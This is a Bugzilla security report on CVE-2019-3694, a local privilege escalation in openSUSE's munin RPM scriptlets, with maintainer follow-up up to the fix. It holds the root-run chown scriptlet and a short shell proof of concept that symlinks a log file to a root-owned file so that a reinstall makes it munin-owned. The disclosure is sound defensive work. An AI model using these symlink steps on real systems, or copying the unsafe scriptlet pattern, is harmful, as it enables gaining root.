Bugzilla – Bug 1155078
VUL-0: CVE-2019-3694: munin: LPE from munin to root
Last modified: 2024-06-13 15:15:05 UTC
214 %post 215 chown -R munin:munin %{htmldir} 216 chown -R munin:munin %{dbdir} 217 chmod 755 %{dbdir} 218 touch %{logdir}/munin-graph.log %{logdir}/munin-html.log %{logdir}/munin-nagios.log %{logdir}/munin-limits.log %{logdir}/munin-update.log 219 chown munin:munin %{logdir}/* allows LPE from munin to root. POC: sh-5.0$ id uid=463(munin) gid=462(munin) groups=462(munin) sh-5.0$ pwd /var/log/munin sh-5.0$ rm munin-graph.log sh-5.0$ ln -s /test/shadow munin-graph.log sh-5.0$ ls -l total 0 lrwxrwxrwx 1 munin munin 12 Oct 25 11:13 munin-graph.log -> /test/shadow -rw-r--r-- 1 munin munin 0 Oct 25 11:12 munin-html.log -rw-r--r-- 1 munin munin 0 Oct 25 11:12 munin-limits.log -rw-r--r-- 1 munin munin 0 Oct 25 11:12 munin-nagios.log -rw-r--r-- 1 root root 0 Oct 25 11:12 munin-node.log -rw-r--r-- 1 munin munin 0 Oct 25 11:12 munin-update.log sh-5.0$ ls -l /test/ total 4 -r-------- 1 root root 1228 Oct 25 11:01 shadow force reinstall of munin sh-5.0$ ls -l /test/ total 4 -r-------- 1 munin munin 1228 Oct 25 11:13 shadow The recursive chown calls can be exploited in a similar way with hardlinks on systems that have fs.protected_hardlinks=0
Please use CVE-2019-3694 to track this. We can make this bug public at any time.
similar issues in %post node 256 %post node 257 if [ $1 = 1 ]; then 258 /usr/sbin/munin-node-configure --shell | sh 259 fi 260 chown -R munin:munin %{dbdir} 261 chmod 755 %{dbdir} 262 touch %{logdir}/munin-node.log 263 chown munin:munin %{logdir}/* 264 chown root:root %{logdir}/munin-node.log* 265 chown -R nobody:nobody %{dbdir}/plugin-state/* >/dev/null 2>&1
can you please have look? We want to make these issue public in the near future. Thank you
Please submit for this
ping, please have a look
Do you have hints what the correct solution is?
(In reply to Wolfgang Rosenauer from comment #6) So the easiest solution would be to remove this snippets and have rpm create the files with proper permissions. For the log files that might be tricky since you don't want to overwrite them upon update. Doesn't munin create them if they're missing? If not you can use runuser to touch them as munin directly, that's safe
Can you please submit for this? Feel free to reach out if you have questions.
This has been open for a really long time. Can you please work on this? Otherwise I'll file a drop request next week
There are new maintainers. @Wolfgang: Do you want to reassign this bug to them?
script was dropped, thanks
This is an autogenerated message for OBS integration: This bug (1155078) was mentioned in https://build.opensuse.org/request/show/1180707 Factory / munin